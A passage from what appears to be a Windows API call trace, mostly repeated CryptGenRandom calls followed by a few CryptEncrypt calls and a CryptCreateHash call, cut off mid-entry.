pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.272] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.275] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.275] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.276] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, 